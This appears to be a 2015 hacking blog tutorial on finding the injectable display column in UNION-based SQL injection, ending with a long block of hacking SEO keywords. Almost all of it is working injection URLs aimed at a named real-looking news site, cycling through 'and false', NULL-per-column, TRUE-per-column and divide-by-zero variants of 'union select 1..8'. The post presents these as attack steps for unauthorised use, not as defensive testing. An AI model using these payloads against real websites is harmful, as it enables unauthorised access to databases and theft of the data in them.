Find vulnerable column in SQL injection (ALL Methods)
In the name of mightiest and most merciful ALLAH who gave me knowledge ^_^
Many time it happends we got the vuln site but didn’t get the vulnerable columm in SQL injection .
toDaY i am going to teach here all methods of showing vuln column which i know:::::
Site- http://www.northernoutpost.com/news.php?id=17
Steps::::
http://www.northernoutpost.com/news.php?id=17+and+false+union+select+1,2,3,4,5,6,7,8–+
http://www.northernoutpost.com/news.php?id=17+and+0+union+select+1,2,3,4,5,6,7,8–+
http://www.northernoutpost.com/news.php?id=17+and+true+union+select+1,2,3,4,5,6,7,8–+ ==> Not
http://www.northernoutpost.com/news.php?id=17+div+0+union+select+1,2,3,4,5,6,7,8–+
http://www.northernoutpost.com/news.php?id=17+div+false+union+select+1,2,3,4,5,6,7,8–+
http://www.northernoutpost.com/news.php?id=17+div+true+union+select+1,2,3,4,5,6,7,8–+ ===> This condition is not working here……
http://www.northernoutpost.com/news.php?id=17+and+1=0+union+select+1,2,3,4,5,6,7,8–+
http://www.northernoutpost.com/news.php?id=17+and+1=2+union+select+1,2,3,4,5,6,7,8–+
http://www.northernoutpost.com/news.php?id=17/0+union+select+1,2,3,4,5,6,7,8–+
http://www.northernoutpost.com/news.php?id=17/false+union+select+1,2,3,4,5,6,7,8–+
http://www.northernoutpost.com/news.php?id=.17+union+select+1,2,3,4,5,6,7,8–+
http://www.northernoutpost.com/news.php?id=1.7+union+select+1,2,3,4,5,6,7,8–+
Now i will show by changing parameter::::
http://www.northernoutpost.com/news.php?id=999999+and+false+union+select+1,2,3,4,5,6,7,8–+
http://www.northernoutpost.com/news.php?id=NULL+union+select+1,2,3,4,5,6,7,8–+
======> This all method will not work only some will work and some will not work it is just a condition so…… Here this is also not working…..
http://www.northernoutpost.com/news.php?id=11111+and+false+union+select+1,2,3,4,5,6,7,8–+
So now this method will show yOu by changing COLUMN number
http://www.northernoutpost.com/news.php?id=-17+union+select+1111,2222,3333,4444,5555,6666,7777,8888–+
===> When you put this you will get vuln column in source just make sure there is one invalid image when you put this::::
http://www.northernoutpost.com/news.php?id=-17+union+select+NULL,2,3,4,5,6,7,8–+
http://www.northernoutpost.com/news.php?id=-17+union+select+NULL,NULL,3,4,5,6,7,8–+
http://www.northernoutpost.com/news.php?id=-17+union+select+NULL,NULL,NULL,4,5,6,7,8–+
http://www.northernoutpost.com/news.php?id=-17+union+select+NULL,NULL,Null,5,6,7,8–+
http://www.northernoutpost.com/news.php?id=-17+union+select+NULL,NULL,Null,NULL,NULL,6,7,8–+
http://www.northernoutpost.com/news.php?id=-17+union+select+1,2,3,4,5,NULL,7,8–+
http://www.northernoutpost.com/news.php?id=-17+union+select+NULL,NULL,Null,NULL,NULL,NULL,NULL,8–+
http://www.northernoutpost.com/news.php?id=-17+union+select+NULL,NULL,Null,NULL,NULL,NULL–+ (in this method try to put null in every column then when Null work in 2 column then it will show vuln column 2 and when null in 4 if it’s work here vuln column will in 4 or if null in 7 and giving result then vuln column is 7)
http://www.northernoutpost.com/news.php?id=-17+union+select+TRUE,2,3,4,5,6,7,8–+
http://www.northernoutpost.com/news.php?id=-17+union+select+1,TRUE,3,4,5,6,7,8–+
http://www.northernoutpost.com/news.php?id=-17+union+select+1,2,TRUE,4,5,6,7,8–+
http://www.northernoutpost.com/news.php?id=-17+union+select+1,2,TRUE,4,5,6,7,8–+
http://www.northernoutpost.com/news.php?id=-17+union+select+1,2,3,TRUE,5,6,7,8–+
http://www.northernoutpost.com/news.php?id=-17+union+select+1,2,3,4,TRUE,6,7,8–+
http://www.northernoutpost.com/news.php?id=-17+union+select+1,2,3,4,5,TRUE,7,8–+
http://www.northernoutpost.com/news.php?id=-17+union+select+1,2,3,4,5,6,TRUE,8–+
http://www.northernoutpost.com/news.php?id=-17+union+select+1,2,3,4,5,6,7,TRUE–+ (this method is also just like NULL ONE)
http://www.northernoutpost.com/news.php?id=-17+union+(select+1,2,3,4,5,6,7,8)–+
http://www.northernoutpost.com/news.php?id=-17+union+(select+(1),(2),(3),(4),(5),(6),(7),(8))–+
I hope this will help you
#HOPE YOU UNDERSTAND
Keep sharing and keep visiting for new more hacks
Keywords:-
Hacking By Navdeep Singh, Hackers Blog, Black Hat Hacker,
Hackers, hacking, Hacking News Blog, Free Hacking Study, Best Hacking Institute, Xss, Cross Site Scripting, Stored XSS, How To Hack, Hacking Book, Hacking Tools, Hacking Tutorials, Windows Hacking, Advance System Hacking, Website Hacking, Hacking News, Hackers News, The Hackers News
Mobile Hacking, Games Hacking, Android Hacking, Facebook Hacking, Google Hacking, Google Dorks, Email Hacking, Virus, Gmail Hacking, Whats App Hacking, Ip Changer, Ip Hide, tor, Cracking Tools, email hacking, Android Tools For Hacker, Mobile Game Hacking, Pc Game hacking, Facebook Trick, Clickjacking, Metasploit Tutorial, phising, phising attack, Keylogger Tutorial, Keylogger, KALI AND BACKTRACK, KALI AND BACKTRACK Tutorial, Web Hacking, Sqli, Sql Injection, Sqli Cheat Sheet, Sqli Admin Bypass, Wifi Hacking, Wifi Password Hacking
Find vulnerable column in SQL injection (ALL Methods)
Reviewed by Unknown
on
12/09/2015
Rating: